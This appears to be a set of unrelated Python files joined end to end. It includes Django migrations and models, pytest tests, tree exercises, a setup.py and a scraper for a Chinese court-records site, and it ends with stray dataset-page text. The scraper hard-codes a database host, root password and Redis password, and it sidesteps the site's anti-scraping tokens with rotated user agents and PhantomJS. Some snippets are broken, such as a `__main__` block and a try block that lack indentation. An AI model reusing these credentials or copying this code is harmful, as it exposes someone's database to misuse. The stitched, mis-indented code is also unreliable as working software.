    """Predict current occupancy as the average of maxoccupancy at the same
    hour/minute over a fixed week (Oct 9-15, 2015).

    Reads through the module-level ``cursor``; returns an int average.
    """
    now = datetime.fromtimestamp(time.time())
    sum_occupancy = 0
    for offset in range(0, 7):
        d = datetime(year=2015, month=10, day=(9 + offset), hour=now.hour, minute=now.minute)
        prev_timestamp = calendar.timegm(d.utctimetuple())
        # FIX: query parameters must be a sequence — `(prev_timestamp)` is just
        # a parenthesised scalar, not the 1-tuple DB-API expects.
        cursor.execute("""select maxoccupancy from bid_data where timestamp = (%s)""", (prev_timestamp,))
        # Each fetched row is a tuple; the original's `for (maxoccupancy) in
        # cursor` did not unpack it either — index the row explicitly.
        for row in cursor:
            sum_occupancy += row[0]
    return int(sum_occupancy / 7)
|
# Generated by Django 3.0.7 on 2021-07-13 16:29
from django.db import migrations, models
import phonenumber_field.modelfields
class Migration(migrations.Migration):
    """Auto-generated migration: alters the order model's payment_method,
    phonenumber, and status field definitions (choices, indexing, defaults)."""

    dependencies = [
        ('foodcartapp', '0045_auto_20210201_1929'),
    ]
    operations = [
        migrations.AlterField(
            model_name='order',
            name='payment_method',
            field=models.IntegerField(choices=[(1, 'Наличностью'), (2, 'Электронно')], db_index=True, default=1, verbose_name='Способ оплаты'),
        ),
        migrations.AlterField(
            model_name='order',
            name='phonenumber',
            field=phonenumber_field.modelfields.PhoneNumberField(db_index=True, max_length=20, region='RU', verbose_name='Мобильный номер'),
        ),
        migrations.AlterField(
            model_name='order',
            name='status',
            field=models.IntegerField(choices=[(1, 'Необработанный'), (2, 'Готовится'), (3, 'Выполнен')], db_index=True, default=1, verbose_name='Статус заказа'),
        ),
    ]
|
import pytest
from mock import patch, Mock
from processing.image_publishing import ImgPublisher
from external_api.dbx import RussDropBox
from external_api.gcp_pubsub import ImgPathPubisher
@pytest.fixture
def publisher():
    # Publisher over a RussDropBox test instance; no pubsub client (None).
    yield ImgPublisher( RussDropBox('',True, 100), None)
def test_should_skip_thumbnail(mocker):
    # Paths containing the thumbnail marker must be filtered out entirely.
    publisher = ImgPublisher( RussDropBox('',True, 100), None)
    mocker.patch('processing.image_publishing.RussDropBox.get_image_paths', return_value = ['my_thumb_nail'])
    paths = list(publisher.publish_dbx_library())
    assert len(paths) == 0
def test_should_return_non_thumbnails(mocker):
    # A non-thumbnail path ('nal', not 'nail') must be yielded by the publisher.
    publisher = ImgPublisher( RussDropBox('',True, 100), None)
    mocker.patch('processing.image_publishing.RussDropBox.get_image_paths', return_value = ['my_thumb_nal'])
    paths = list(publisher.publish_dbx_library(True))
    assert len(paths) == 1
@patch.object(RussDropBox, 'get_image_paths')
def test_should_skip_thumbnail_mocked(mock_my_method, publisher):
    """Same check via mock.patch.object and the shared fixture.

    FIX: renamed from ``test_should_skip_thumbnail`` — it previously reused
    that name, shadowing the earlier mocker-based test so pytest never ran it.
    """
    mock_my_method.return_value = ['my_thumb_nail']
    paths = list(publisher.publish_dbx_library())
    assert len(paths) == 0
@patch.object(RussDropBox, 'get_image_paths')
@pytest.mark.parametrize("filenames, return_count",
                         [(["'my_thumb_nail"],0),
                          (["'my_thumb_nal"],1),
                          (["'my_thumb_nal", "nal2"],2)])
def test_should_skip_thumbnails_but_run_others(mock_my_method, publisher, filenames, return_count):
    # Thumbnails are skipped; every other filename yields one published path.
    mock_my_method.return_value = filenames
    paths = list(publisher.publish_dbx_library(True))
    assert len(paths) == return_count
@patch('external_api.gcp_pubsub.ImgPathPubisher')
@patch('external_api.dbx.RussDropBox')
@pytest.mark.parametrize("filenames",
                         [["'my_thumb_nal"], ["'my_thumb_nal2", "nal2"]])
def test_should_skip_thumbnails_but_run_others2(mock_dropbox, mock_messaging, filenames):
    # Fully mocked dropbox and pubsub: publish must be called once per file.
    dbx_mock = mock_dropbox.return_value
    dbx_mock.get_image_paths.return_value = filenames
    pub_mock = mock_messaging.return_value
    my_publisher = ImgPublisher( dbx_mock, pub_mock)
    # important to wrap in list, so the yield is exercised
    list(my_publisher.publish_dbx_library(False))
    assert pub_mock.publish.call_count == len(filenames)
|
import numpy
# NOTE(review): input() returns strings, so `number`/`number2` hold text
# (e.g. '2'); neither variable — nor numpy — is used afterwards.
number= input( 'Enter number x: ') # '2' 2
number2= input('Enter number y: ')
# Prints a hard-coded student ID.
print('0076491')
|
# Nested-list outline of a document: each title string may be followed by a
# list holding its children (sections under chapters, paragraphs under sections).
tree = [
    "chapter 1", [
        "section 1.1", [
            "paragraph 1.1.1",
            "paragraph 1.1.2",
            "paragraph 1.1.3",
        ],
        "section 1.2", [
            "paragraph 1.2.1",
        ],
    ],
    "chapter 2", [
        "section 2.1", [
            "paragraph 2.1.1",
            "paragraph 2.1.2",
        ],
        "section 2.2",
    ],
    "chapter 3", [
        "section 3.1",
        "section 3.2",
    ],
]
|
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.5 (default, Aug 12 2020, 00:00:00)
# [GCC 10.2.1 20200723 (Red Hat 10.2.1-1)]
# Embedded file name: c:\Jenkins\live\output\Live\win_64_static\Release\python-bundle\MIDI Remote Scripts\ableton\v2\control_surface\elements\slider.py
# Compiled at: 2020-05-05 13:23:28
from __future__ import absolute_import, print_function, unicode_literals
import Live
from ..input_control_element import MIDI_NOTE_TYPE
from .encoder import EncoderElement
class SliderElement(EncoderElement):
    """Encoder fixed to absolute MIDI mapping (a fader/slider).

    Decompiled Ableton Live remote-script code — treat as read-only.
    """

    def __init__(self, msg_type, channel, identifier, *a, **k):
        # A slider sends continuous values, so note messages are rejected.
        assert msg_type is not MIDI_NOTE_TYPE
        super(SliderElement, self).__init__(msg_type, channel, identifier, map_mode=Live.MidiMap.MapMode.absolute, *a, **k)
# okay decompiling /home/deniz/data/projects/midiremote/Live 10.1.18/ableton/v2/control_surface/elements/slider.pyc
|
from django.db import models
# Create your models here.
class type(models.Model):
    """Website category.

    NOTE(review): the class name shadows the builtin ``type``; other models
    reference it by the string "type", so renaming needs coordinated changes.
    """
    # Human-readable category label.
    category = models.CharField(max_length=64,null=False)
class website(models.Model):
    """A monitored website and how to reach it."""
    url = models.CharField(unique=True,max_length=255,null=False)
    ip = models.CharField(default="0.0.0.0",max_length=32)
    port = models.IntegerField(default=80)
    name = models.CharField(max_length=255,null=False)
    # NOTE(review): ForeignKey without on_delete — that argument is mandatory
    # in Django >= 2.0, so this presumably targets Django 1.x; confirm before
    # upgrading.
    types = models.ForeignKey(to="type",to_field="id",default=1)
    verbose = models.CharField(max_length=1024)
    # ctime = models.TimeField(auto_now=True)
class scan_times(models.Model):
    """One scan result for a website at a point in time."""
    # Scan time stored as text (indexed); nullable.
    time = models.CharField(db_index=True,max_length=255,null=True)
    # NOTE(review): ForeignKey without on_delete — mandatory in Django >= 2.0.
    websites = models.ForeignKey(to="website",to_field="id")
    status = models.CharField(max_length=255)
    message = models.CharField(max_length=255)
|
#https://www.hackerrank.com/challenges/angry-professor
# Class is cancelled ("YES") when fewer than k students arrive on time;
# an arrival time <= 0 means on time or early.
cases = int(input())
for _ in range(cases):
    n, k = map(int, input().split())
    arrival_times = list(map(int, input().split()))
    late_count = sum(1 for t in arrival_times if t > 0)
    print("YES" if n - late_count < k else "NO")
|
import requests
import json
import random
import execjs
import pymysql
import redis
class IdSpider(object):
    """Scraper for case listings on wenshu.court.gov.cn, persisting rows to MySQL.

    SECURITY(review): the database host and credentials are hard-coded below
    (and the Redis password in __main__) — move them to configuration or a
    secrets store.
    """

    def __init__(self):
        super().__init__()
        self.db = pymysql.connect(host='rm-wz9wj90j9qzcfasz6.mysql.rds.aliyuncs.com', user='root', port=3306, password='qazwsx12!@',
                                  database='wenshu', charset='utf8')
        self.create_table()
        # Listing endpoint and default query state.
        self.url = 'http://wenshu.court.gov.cn/List/ListContent'
        self.param = ''
        self.index = 1
        self.page = 20
        self.order = '法院层级'
        self.direction = 'asc'
        # Rotating desktop user agents to vary the request fingerprint.
        self.USER_AGENTS = [
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
            'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
            'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
            'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
            'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36',
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
            'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 Safari/537.36'
        ]

    def get_content(self, Param='', Index=1, Page=5, Order='法院层级', Direction='asc', vl5x=None, number=None, guid=None,
                    vjkl5=None):
        """POST the listing query and return the raw response text.

        vl5x / number / guid / vjkl5 are the site's anti-scraping tokens.
        """
        url = 'http://wenshu.court.gov.cn/List/ListContent'
        headers = {
            'user-agent': random.choice(self.USER_AGENTS),
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
        }
        cookies = {
            'vjkl5': vjkl5
        }
        data = {
            'Param': Param,
            'Index': Index,
            'Page': Page,
            'Order': Order,
            'Direction': Direction,
            'vl5x': vl5x,
            'number': number,
            'guid': guid
        }
        res = requests.post(url, data=data, headers=headers, cookies=cookies)
        return res.text

    def get_code(self, guid):
        """Fetch the per-session validation code for *guid*."""
        url = 'http://wenshu.court.gov.cn/ValiCode/GetCode'
        s = requests.Session()
        s.headers.update(
            {
                'user-agent': random.choice(self.USER_AGENTS),
                'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
            }
        )
        data = {
            'guid': guid
        }
        res = s.post(url, data=data)
        return res.text

    def get_vjkl5(self):
        """Hit the listing page and return the anti-scraping vjkl5 cookie."""
        url = 'http://wenshu.court.gov.cn/list/list/?sorttype=1'
        headers = {
            'user-agent': random.choice(self.USER_AGENTS),
        }
        res = requests.get(url, headers=headers)
        return res.cookies['vjkl5']

    def create_table(self):
        """Create the wenshu_id table if it does not exist yet (static DDL)."""
        sql = '''CREATE TABLE
        IF
        NOT EXISTS `wenshu_id` (
        `paperId` VARCHAR ( 36 ) NOT NULL,
        `name` VARCHAR ( 255 ) NOT NULL,
        `content` text NOT NULL,
        `type` VARCHAR ( 8 ) NOT NULL,
        `date` VARCHAR ( 15 ) NOT NULL,
        `procedure` VARCHAR ( 20 ) NOT NULL,
        `anhao` VARCHAR ( 50 ) NOT NULL,
        `courtName` VARCHAR ( 50 ) NOT NULL,
        PRIMARY KEY ( `paperId` )
        ) ENGINE = INNODB DEFAULT CHARSET = utf8'''
        with self.db.cursor() as cursor:
            cursor.execute(sql)
        self.db.commit()

    def save_to_table(self, paperId, name, content, type, date, procedure, anhao, courtName):
        """Insert one scraped document row.

        SECURITY FIX: the original %-interpolated scraped values straight into
        the INSERT statement, which breaks on quotes and is SQL-injectable —
        use a parameterized query instead.
        """
        sql = ('INSERT INTO wenshu_id (paperId, `name`, content, `type`, `date`, '
               '`procedure`, anhao, courtName) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)')
        with self.db.cursor() as cursor:
            cursor.execute(sql, (paperId, name, content, type, date, procedure, anhao, courtName))
        self.db.commit()
if __name__ == '__main__':
    # Worker loop: pop a page index from Redis, solve the site's JS
    # anti-scraping tokens with PhantomJS (process.js), fetch one listing
    # page, and persist every case row to MySQL.
    # SECURITY(review): the Redis password is hard-coded here.
    while True:
        r = redis.Redis(host='127.0.0.1', port=6388, password='qazwsx12!@')
        # r.lpush('wenshu:id', 74)
        idx = r.lpop('wenshu:id')
        index = int(idx)
        print(index)
        with open('./process.js', 'r') as f:
            default = execjs.get('phantomjs')
            data = f.read()
            ect = default.compile(data)
        guid = ect.call('getGuid')
        so = IdSpider()
        number = so.get_code(guid)
        vjkl5 = so.get_vjkl5()
        vl5x = ect.call('getKey', vjkl5)
        text = so.get_content(Index=index, Page=20, Order='法院层级', Direction='asc', vl5x=vl5x, number=number, guid=guid,
                              vjkl5=vjkl5)
        # The response is a JSON string wrapped in quotes with escaped
        # backslashes; strip both before parsing.
        text_pro = text.replace('\\', '')
        text_pro = text_pro.lstrip('\"')
        text_pro = text_pro.rstrip('\"')
        data = json.loads(text_pro)
        if data != '':
            del data[0]  # drop the first element (presumably metadata — TODO confirm)
        for case in data:
            item = {}
            # NOTE(review): the bare `except:` clauses below silently default
            # optional fields; keys are the site's Chinese field names.
            try:
                item['content'] = case['裁判要旨段原文']
            except:
                item['content'] = ''
            item['type'] = case['案件类型']
            item['date'] = case['裁判日期']
            item['name'] = case['案件名称']
            item['paperId'] = case['文书ID']
            try:
                item['procedure'] = case['审判程序']
            except:
                item['procedure'] = ''
            try:
                item['anhao'] = case['案号']
            except:
                item['anhao'] = ''
            item['courtName'] = case['法院名称']
            try:
                so.save_to_table(item['paperId'], item['name'], item['content'], item['type'],
                                 item['date'], item['procedure'], item['anhao'], item['courtName'])
            except Exception as e:
                print(e)
# Question2
# Greedy game: sort descending; the two players alternate picks (Niuniu
# first) and each always takes the largest remaining number.
# Prints Niuniu's total minus Sheep's total.
n = int(input())  # declared count (stdin line consumed; nums drives the game)
nums = sorted(map(int, input().strip().split()), reverse=True)
# FIX: the original special-cased empty input with print(0) but did not stop,
# so it fell through and printed the (zero) difference a second time.
# Slicing handles the empty case naturally and prints exactly once.
niuniu = sum(nums[0::2])  # picks at even positions in sorted order
sheep = sum(nums[1::2])   # picks at odd positions
print(niuniu - sheep)
import os
from flask_assets import Environment, Bundle
# Flask-Assets registration: bundle sources come from the CSS and JS
# environment variables. NOTE(review): os.getenv returns None when the
# variable is unset — these must be defined before import.
assets = Environment()
css = Bundle(os.getenv('CSS'))
assets.register('css_min', css)
favicon = Bundle('favicon.js')
assets.register('favicon', favicon)
js = Bundle(os.getenv('JS'))
assets.register('scripts', js)
|
import json
class Cfg:
    """Application configuration loaded from ``cfg.json`` in the working
    directory (sections: rabbitmq, flask, music_flask_server)."""

    def __init__(self):
        # FIX: the original opened the file and never closed it; `with`
        # guarantees the handle is released even if parsing fails.
        with open('cfg.json') as f:
            data = json.load(f)
        rabbit_params = data['rabbitmq']
        flask_params = data['flask']
        music_server_params = data['music_flask_server']
        # RabbitMQ connection settings.
        self.rabbit_host = rabbit_params['host']
        self.rabbit_port = rabbit_params['port']
        self.rabbit_exchange = rabbit_params['exchange']
        self.rabbit_routing_key = rabbit_params['routing_key_format']
        self.rabbit_username = rabbit_params['username']
        self.rabbit_password = rabbit_params['password']
        # Main Flask server bind address.
        self.flask_host = flask_params['host']
        self.flask_port = flask_params['port']
        # Music Flask server bind address.
        self.music_flask_host = music_server_params['host']
        self.music_flask_port = music_server_params['port']
|
# TREE: represents nodes connected by edges.
# - One node is marked as the root node.
# - Every node except the root is associated with one parent node.
# - Each node can have an arbitrary number of child nodes.
#
# BINARY TREE: a tree whose elements have at most two children.
# Each element in a binary tree can have only two children.
# A node's left child must have a value less than its parent's value, and
# the node's right child must have a value greater than its parent's value.
#
# =============================================================================
class Node:
    """Binary-search-tree node: left subtree < data < right subtree."""

    def __init__(self, data):
        self.left = None
        self.right = None
        self.data = data

    def printTree(self):
        """Print the tree's values in ascending (in-order) order, one per line."""
        if self.left:
            self.left.printTree()
        print(self.data)
        if self.right:
            self.right.printTree()

    def insert(self, data):
        """Insert *data* into the subtree rooted here; duplicates are ignored.

        FIX: the original guard was ``if self.data:``, which is False for a
        falsy payload (0, '', None) and silently overwrote the node instead
        of descending — compare against None explicitly.
        """
        if self.data is None:
            self.data = data
        # smaller values go to the left subtree
        elif data < self.data:
            if self.left is None:
                self.left = Node(data)
            else:
                self.left.insert(data)
        # larger values go to the right subtree
        elif data > self.data:
            if self.right is None:
                self.right = Node(data)
            else:
                self.right.insert(data)

    def findval(self, lkpval):
        """Return a human-readable string saying whether *lkpval* is in the tree."""
        if lkpval < self.data:
            if self.left is None:
                return str(lkpval)+" is not Found"
            return self.left.findval(lkpval)
        elif lkpval > self.data:
            if self.right is None:
                return str(lkpval)+" is not Found"
            return self.right.findval(lkpval)
        else:
            return str(self.data) + " is found"
if __name__ =='__main__':
# result 10 14 19 27 31 35
root = Node(27)
root.insert(14)
root.insert(35)
root.insert(31)
root.insert(10)
root.insert(19)
root.printTree()
print(root.findval(7))
print(root.findval(14))
|
def list_of_depths(tree):
    """Return one linked list (head ListNode) per depth level of *tree*.

    Breadth-first traversal: each visited TreeNode is tagged with its depth,
    and its data is appended to the linked list for that level.  Returns []
    for an empty tree.
    """
    if not tree:
        return []
    heads = []
    pending = Queue()
    current_tail = None
    depth_seen = -1
    tree.depth = 0
    node = tree
    while node:
        if node.depth != depth_seen:
            # First node of a new level: start a fresh list for it.
            depth_seen = node.depth
            current_tail = ListNode(node.data)
            heads.append(current_tail)
        else:
            # Same level as the previous node: extend the current list.
            current_tail.next = ListNode(node.data)
            current_tail = current_tail.next
        for child in (node.left, node.right):
            if child:
                child.depth = node.depth + 1
                pending.add(child)
        node = pending.remove()
    return heads
class TreeNode():
    """Binary-tree node; ``depth`` is filled in later by list_of_depths()."""
    def __init__(self, data=None, left=None, right=None):
        self.data = data
        self.left = left
        self.right = right
        self.depth = None
class ListNode():
    """Singly linked list node; str() renders the whole chain, e.g. 'A,B,None'."""
    def __init__(self, data=None, next=None):
        self.data = data
        self.next = next
    def __str__(self):
        # Recursively stringify the rest of the chain after this node's data.
        return '{},{}'.format(self.data, self.next)
class Queue():
    """Minimal FIFO queue backed by a singly linked chain of ListNode wrappers."""
    def __init__(self):
        self.head = None
        self.tail = None
    def add(self, item):
        """Append *item* at the tail of the queue."""
        node = ListNode(item)
        if self.head is None:
            # Empty queue: the new node is both head and tail.
            self.head = self.tail = node
        else:
            self.tail.next = node
            self.tail = node
    def remove(self):
        """Pop and return the head item, or None when the queue is empty."""
        if self.head is None:
            return None
        item = self.head.data
        self.head = self.head.next
        return item
import unittest
class Test(unittest.TestCase):
    """Unit test for list_of_depths() on a small unbalanced tree."""
    def test_list_of_depths(self):
        # Tree shape:       A
        #                 /   \
        #                B     C
        #               / \     \
        #              D   E     F
        #             /   /
        #            H   G
        leaf_h = TreeNode('H')
        leaf_g = TreeNode('G')
        leaf_f = TreeNode('F')
        node_e = TreeNode('E', leaf_g)
        node_d = TreeNode('D', leaf_h)
        node_c = TreeNode('C', None, leaf_f)
        node_b = TreeNode('B', node_d, node_e)
        root = TreeNode('A', node_b, node_c)
        levels = list_of_depths(root)
        # One linked list per depth, left-to-right within each level.
        self.assertEqual(str(levels[0]), "A,None")
        self.assertEqual(str(levels[1]), "B,C,None")
        self.assertEqual(str(levels[2]), "D,E,F,None")
        self.assertEqual(str(levels[3]), "H,G,None")
        self.assertEqual(len(levels), 4)
if __name__ == "__main__":
    # Run the test suite when this module is executed directly.
    unittest.main()
|
from distutils.version import LooseVersion
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.contrib.auth.models import Permission
class TruncatingCharField(models.CharField):
    """CharField that silently truncates values to ``max_length`` before saving."""
    def get_prep_value(self, value):
        """Return the prepared value, clipped to at most ``max_length`` characters."""
        prepared = super(TruncatingCharField, self).get_prep_value(value)
        if not prepared:
            # None / empty string: nothing to truncate.
            return prepared
        return prepared[:self.max_length]
class Application(models.Model):
    """An application whose visibility is guarded by a per-instance Permission."""
    # Prefix of the per-application "can view" permission codename; the
    # application name is appended to it in save()/delete().
    appPermissionCode = 'can_view_application_'
    name = models.CharField(max_length=50)
    def get_linked_applications(self):
        """Follow the linkedApplication chain and return every linked Application.

        NOTE(review): linkedApplication is declared below as a ManyToManyField,
        but this method treats it like a single related object (`.id`, direct
        recursion) — it reads as if written for a ForeignKey; confirm behavior.
        """
        linked_applications = []
        # Guard against a self-link, which would recurse forever.
        if self.linkedApplication and self.linkedApplication.id != self.id:
            linked_applications.append(self.linkedApplication)
            linked_applications += self.linkedApplication.get_linked_applications()
        return linked_applications
    linkedApplication = models.ManyToManyField("self", related_name='linked_application', symmetrical=False)
    linkedApplication.short_description = 'linked application'
    def __str__(self):
        return self.name
    def save(self, *args, **kwargs):
        """Save the application, then ensure its 'can view' Permission exists."""
        super(Application, self).save(*args, **kwargs)
        content_type = ContentType.objects.get_for_model(Application)
        # Idempotent: get_or_create avoids duplicate permissions on re-save.
        Permission.objects.get_or_create(
            codename=Application.appPermissionCode + self.name,
            name='Can view application and related variables and versions for ' + self.name,
            content_type=content_type,
        )
    def delete(self, *args, **kwargs):
        """Delete the application along with its 'can view' Permission."""
        super(Application, self).delete(*args, **kwargs)
        Permission.objects.get(codename=Application.appPermissionCode + self.name).delete()
class Version(models.Model):
    """A named version (e.g. '1.2.3') of an Application."""
    application = models.ForeignKey(Application, related_name='version', on_delete=models.CASCADE)
    name = models.CharField(max_length=50)
    def __str__(self):
        return self.application.name + '-' + self.name
    def previousVersions(self):
        """
        Get all versions for the same application strictly previous to this
        one, sorted ascending by version number.
        """
        # LooseVersion gives numeric-aware ordering ('1.10' > '1.9').
        versions = [v for v in Version.objects.filter(application=self.application) if LooseVersion(v.name) < LooseVersion(self.name)]
        versions.sort(key=lambda v: LooseVersion(v.name), reverse=False)
        return versions
    def nextVersions(self):
        """
        Get all versions for the same application from this one onwards
        (inclusive — note the >=), sorted ascending by version number.
        """
        versions = [v for v in Version.objects.filter(application=self.application) if LooseVersion(v.name) >= LooseVersion(self.name)]
        versions.sort(key=lambda v: LooseVersion(v.name), reverse=False)
        return versions
class TestEnvironment(models.Model):
    """
    An environment can be linked to an other one.
    For example, NonReg1 is a NonReg environment from which it will get all
    variables.
    """
    __test__= False # avoid detecting it as a test class
    name = models.CharField(max_length=20)
    def __str__(self):
        return self.name
    def get_parent_environments(self):
        """Return the chain of generic (parent) environments, nearest first."""
        parent_environments = []
        # Guard against a self-reference, which would recurse forever.
        if self.genericEnvironment and self.genericEnvironment.id != self.id:
            parent_environments.append(self.genericEnvironment)
            parent_environments += self.genericEnvironment.get_parent_environments()
        return parent_environments
    # Optional self-referencing parent from which variables are inherited.
    genericEnvironment = models.ForeignKey('self', null=True, on_delete=models.CASCADE)
    genericEnvironment.short_description = 'generic environnement'
class TestCase(models.Model):
    """A named test case belonging to an Application."""
    __test__ = False  # avoid detecting it as a test class
    name = models.CharField(max_length=150)
    application = models.ForeignKey(Application, related_name='testCase', on_delete=models.CASCADE)
    def __str__(self):
        return "{} - {}".format(self.name, self.application.name)
"""Setup module"""
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open # pylint:disable=W0622
from os.path import abspath, dirname, join
README = join(abspath(dirname(__file__)), 'README.md')
try:
import pypandoc
DESCRIPTION = pypandoc.convert(README, 'rst')
except(IOError, ImportError):
# Get the long description from the README file
with open(README, encoding='utf-8') as fptr:
DESCRIPTION = fptr.read()
setup(
name='SimpleInterceptor',
version='0.1',
description='Simple interceptor related to concepts of AOP',
long_description=DESCRIPTION,
url='https://github.com/host-anshu/simpleInterceptor',
author='Anshu Choubey',
author_email='anshu.choubey@imaginea.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
keywords='python interceptor aop call graph tree',
packages=find_packages(),
py_modules=['interceptor'],
install_requires=['ansible>=2.0'],
entry_points={
'console_scripts': [
'interceptor=interceptor:intercept',
],
},
test_suite="test"
)
|
#!/bin/env python
#
# Plot GOOG's adjusted close price with its zigzag peak/valley pivots.
import pandas as pd
# NOTE(review): pandas.io.data was removed from pandas (0.19+); this import
# only works on very old pandas — newer code uses the pandas-datareader package.
import pandas.io.data as web
from qrzigzag import peak_valley_pivots, max_drawdown, compute_segment_returns, pivots_to_modes
# Daily adjusted close series for GOOG from Yahoo Finance.
X = web.get_data_yahoo('GOOG')['Adj Close']
# Mark pivots where the price reverses by at least 20% in either direction.
pivots = peak_valley_pivots(X, 0.2, -0.2)
ts_pivots = pd.Series(X, index=X.index)
ts_pivots = ts_pivots[pivots != 0]  # keep only the pivot points
X.plot()
ts_pivots.plot(style='g-o')  # overlay pivots as a green line with markers
# Generated by Django 2.2 on 2019-04-26 09:09
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: replace the old Bid model with FBidder."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('market', '0071_auto_20190426_0925'),
    ]
    operations = [
        # New bidder table; bid_amount is a digits-only CharField and
        # bid_status is a PENDING/WINNER choice defaulting to PENDING.
        migrations.CreateModel(
            name='FBidder',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('bid_amount', models.CharField(max_length=255, validators=[django.core.validators.RegexValidator('^[0-9]*$', 'Only numeric are allowed.')])),
                ('bid_status', models.CharField(choices=[('PENDING', '0'), ('WINNER', '1')], default='PENDING', max_length=20)),
                ('product_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='market.Product')),
                ('user_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Drop the superseded Bid model (and its table).
        migrations.DeleteModel(
            name='Bid',
        ),
    ]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.